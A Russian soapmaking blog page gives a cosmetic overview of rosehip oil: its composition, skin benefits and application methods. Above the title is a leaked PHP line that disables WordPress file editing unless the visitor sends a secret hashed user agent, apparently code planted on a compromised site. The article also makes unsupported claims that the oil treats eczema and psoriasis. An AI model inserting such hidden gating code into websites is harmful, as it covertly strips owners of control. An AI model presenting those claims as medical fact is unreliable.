if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло шиповника | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло шиповника

О поразительных свойствах шиповника знали еще в древней Спарте, а на Руси его уже в 17-м веке использовали для заживления ран и снаряжали специальные экспедиции с целью заготовки этих целебных плодов

Ингридиенты для мыла - масло шиповника Ингридиенты для мыла - масло шиповника

О пора­зи­тель­ных свой­ствах шипов­ни­ка зна­ли еще в древ­ней Спар­те, а на Руси его уже в 17‑м веке исполь­зо­ва­ли для зажив­ле­ния ран и сна­ря­жа­ли спе­ци­аль­ные экс­пе­ди­ции с целью заго­тов­ки этих целеб­ных плодов. 

О том, что из семян шипов­ни­ка мож­но полу­чать мас­ло, ста­ло извест­но отно­си­тель­но недав­но, но на сего­дняш­ний момент мас­ло шипов­ни­ка вхо­дит в спи­сок самых попу­ляр­ных рас­ти­тель­ных масел, при­ме­ня­е­мых в косметологии.

Кос­ме­ти­че­ское мас­ло шипов­ни­ка полу­ча­ют из пло­до­вых семян мето­дом холод­но­го отжи­ма или путем низ­ко­тем­пе­ра­тур­ной экс­трак­ции. Такие тех­но­ло­гии поз­во­ля­ют сохра­нить в цело­сти и сохран­но­сти все уни­каль­ные веще­ства, вхо­дя­щие в состав мас­ла и обу­слов­ли­ва­ю­щие его целеб­ные свойства.

Мас­ло шипов­ни­ка содер­жит более 15-ти видов раз­лич­ных насы­щен­ных, моно­не­на­сы­щен­ных и поли­не­на­сы­щен­ных жир­ных кис­лот, основ­ной про­цент кото­рых состав­ля­ет лино­ле­вая, лино­ле­но­вая и оле­и­но­вая кис­ло­та. Эти кис­ло­ты спо­соб­ству­ют укреп­ле­нию защит­но­го барье­ра кожи и явля­ют­ся высо­ко­эф­фек­тив­ным стро­и­тель­ным мате­ри­а­лом для ее кле­ток. В част­но­сти, неза­ме­ни­мые нена­сы­щен­ные жир­ные кис­ло­ты име­ют основ­ное зна­че­ние для под­дер­жа­ния упру­го­сти кожи и исполь­зу­ют­ся прак­ти­че­ски во всех совре­мен­ных кос­ме­ти­че­ских сред­ствах, пред­на­зна­чен­ных для пре­ду­пре­жде­ния мор­щин. При недо­стат­ке таких кис­лот защит­ные функ­ции кожи рез­ко сни­жа­ют­ся, она ста­но­вит­ся раз­дра­жен­ной и обез­во­жен­ной, что при­во­дит к ее преж­де­вре­мен­но­му увяданию.

Так­же кос­ме­ти­че­ское мас­ло шипов­ни­ка содер­жит доста­точ­но высо­кий про­цент вита­ми­нов C, E, и про­ре­ти­но­ла A (вита­мин a). Ну а, как извест­но, вита­ми­ны C и E явля­ют­ся силь­ней­ши­ми анти­ок­си­дан­та­ми, кото­рые эффек­тив­но борют­ся со сво­бод­ны­ми ради­ка­ла­ми и зна­чи­тель­но замед­ля­ют про­цесс ста­ре­ния кожи. Кро­ме того, вита­мин C помо­га­ет сти­му­ли­ро­вать син­тез кол­ла­ге­на, крайне необ­хо­ди­мо­го для под­дер­жа­ния эла­стич­но­сти, упру­го­сти и тону­са кожи. А вита­мин E в свою оче­редь спо­соб­ству­ет хоро­ше­му увлаж­не­нию кожи, насы­ще­нию ее кис­ло­ро­дом и сохра­не­нию ее све­же­сти, кра­со­ты и моло­до­сти. Про­ре­ти­нол A защи­ща­ет кожу от агрес­сив­но­го воз­дей­ствия окру­жа­ю­щей сре­ды и обес­пе­чи­ва­ет под­дер­жа­ние ее здо­ро­вья. Поми­мо это­го он ока­зы­ва­ет освет­ля­ю­щее дей­ствие на кожу и явля­ет­ся обя­за­тель­ным ком­по­нен­том кос­ме­то­ло­ги­че­ских средств борю­щих­ся с гипер­пиг­мен­та­ци­ей. При его недо­стат­ке нару­ша­ют­ся защит­ные функ­ции кож­ных покро­вов, кожа начи­на­ет гру­беть и шелушиться.

За счет тако­го раз­но­об­ра­зия ком­по­нен­тов кос­ме­ти­че­ское мас­ло шипов­ни­ка обла­да­ет доволь­но таки широ­ким спек­тром воз­дей­ствия на кожу лица. Его при­ме­не­ние поз­во­ля­ет нор­ма­ли­зо­вать обмен­ные про­цес­сы кожи и вос­пре­пят­ство­вать накоп­ле­нию про­дук­тов рас­па­да в ее клет­ках, кото­рые при­во­дят к преж­де­вре­мен­но­му ста­ре­нию кож­ных покровов.
Так­же мас­ло шипов­ни­ка обла­да­ет хоро­ши­ми пита­тель­ны­ми и увлаж­ня­ю­щи­ми свой­ства­ми, ока­зы­ва­ет про­ти­во­мик­роб­ное дей­ствие, повы­ша­ет мест­ный имму­ни­тет кожи и спо­соб­ству­ет ее защи­те от агрес­сив­но­го воз­дей­ствия уль­тра­фи­о­ле­то­вых лучей.

Бла­го­да­ря сво­им уни­каль­ным реге­не­ри­ру­ю­щим свой­ствам мас­ло шипов­ни­ка уско­ря­ет про­цесс зажив­ле­ния раз­лич­ных повре­жде­ний кожи, таких как ожо­ги, тре­щин­ки, поре­зы и т.д. Так­же оно помо­га­ет устра­нить кос­ме­ти­че­ские дефек­ты кожи, как напри­мер руб­цы, шра­мы и пят­на после прыщей.

При­ме­не­ние мас­ла шипов­ни­ка пре­крас­но помо­га­ет в борь­бе со ста­ре­ни­ем кожи, предот­вра­ща­ет появ­ле­ние мор­щин на лице, раз­гла­жи­ва­ет уже име­ю­щи­е­ся мор­щи­ны и хоро­шо повы­ша­ет упру­гость и эла­стич­ность кожи. Кро­ме того это мас­ло широ­ко исполь­зу­ют с целью умень­ше­ния пиг­мен­та­ции кожи и вырав­ни­ва­ния ее поверх­но­сти. А так­же его при­ме­не­ние реко­мен­ду­ет­ся в каче­стве целеб­но­го наруж­но­го сред­ства при таких забо­ле­ва­ни­ях кожи как ней­ро­дер­мит, экзе­ма и псориаз.

Кос­ме­ти­че­ское мас­ло шипов­ни­ка заме­ча­тель­но под­хо­дит для ухо­да за уста­лой и увя­да­ю­щей кожей лица и кожи вокруг глаз, а так­же за сухой, шелу­ша­щей­ся и чув­стви­тель­ной кожей. Оно явля­ет­ся очень лег­ким по сво­ей тек­сту­ре и прак­ти­че­ски не остав­ля­ет жир­но­го блес­ка на коже. Несмот­ря на то, что мас­ло шипов­ни­ка спо­соб­ству­ет нор­ма­ли­за­ции саль­ных желез и суже­нию пор, его при­ме­не­ние в чистом виде при повы­шен­ной жир­но­сти кожи, склон­ной к появ­ле­нию пры­щей, крайне не рекомендуется.

Применение масла шиповника

Иде­аль­но исполь­зо­вать мас­ло шипов­ни­ка в ухо­де за неж­ной и тон­кой кожей вокруг глаз. Его мож­но нано­сить как и само­сто­я­тель­ное сред­ство, так и сме­ши­вать в неогра­ни­чен­ных про­пор­ци­ях с кре­мом для век, кото­рым вы еже­днев­но поль­зу­е­тесь. Что­бы добить­ся наи­боль­ше­го резуль­та­та по предот­вра­ще­нию мор­щи­нок и устра­не­нию уже име­ю­щих­ся, после нане­се­ния мас­ло необ­хо­ди­мо слег­ка повби­вать в кожу лег­ки­ми похло­пы­ва­ю­щи­ми дви­же­ни­я­ми поду­ше­чек пальцев.

При сухой и увя­да­ю­щей коже лица кос­ме­ти­че­ское мас­ло шипов­ни­ка так­же мож­но исполь­зо­вать как и в чистом нераз­бав­лен­ном виде, заме­няя им еже­днев­ный крем, так и добав­лять в уже име­ю­щи­е­ся кре­мы. Опять же, нано­сить его жела­тель­но лег­ки­ми похло­пы­ва­ю­щи­ми дви­же­ни­я­ми. Так вы уси­ли­те при­ток кро­ви к поверх­ност­ным сло­ям кожи и уве­ли­чи­те эффек­тив­ность воз­дей­ствия уни­каль­ных свойств мас­ла. При ком­би­ни­ро­ван­ной (сме­шан­ной) коже чистое мас­ло шипов­ни­ка необ­хо­ди­мо нано­сить толь­ко на сухие ее участ­ки (щеки, область вокруг губ), избе­гая Т‑зоны (лоб, нос и подбородок).

При лече­нии кож­ных забо­ле­ва­ний, а так­же для ско­рей­ше­го зажив­ле­ния повре­жде­ний кожи или же для устра­не­ния ее кос­ме­ти­че­ских дефек­тов, мас­лом шипов­ни­ка нуж­но хоро­шень­ко про­пи­ты­вать сте­риль­ные мар­ле­вые сал­фет­ки и при­кла­ды­вать их к пора­жен­ным участ­кам на 25–30 минут, хотя бы 2–3 раза в день. Кро­ме все­го про­че­го, при­ме­не­ние мас­ла шипов­ни­ка хоро­шо под­хо­дит для кос­ме­ти­че­ско­го мас­са­жа лица  и в каче­стве базо­во­го мас­ла для при­го­тов­ле­ния домаш­них кремов.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!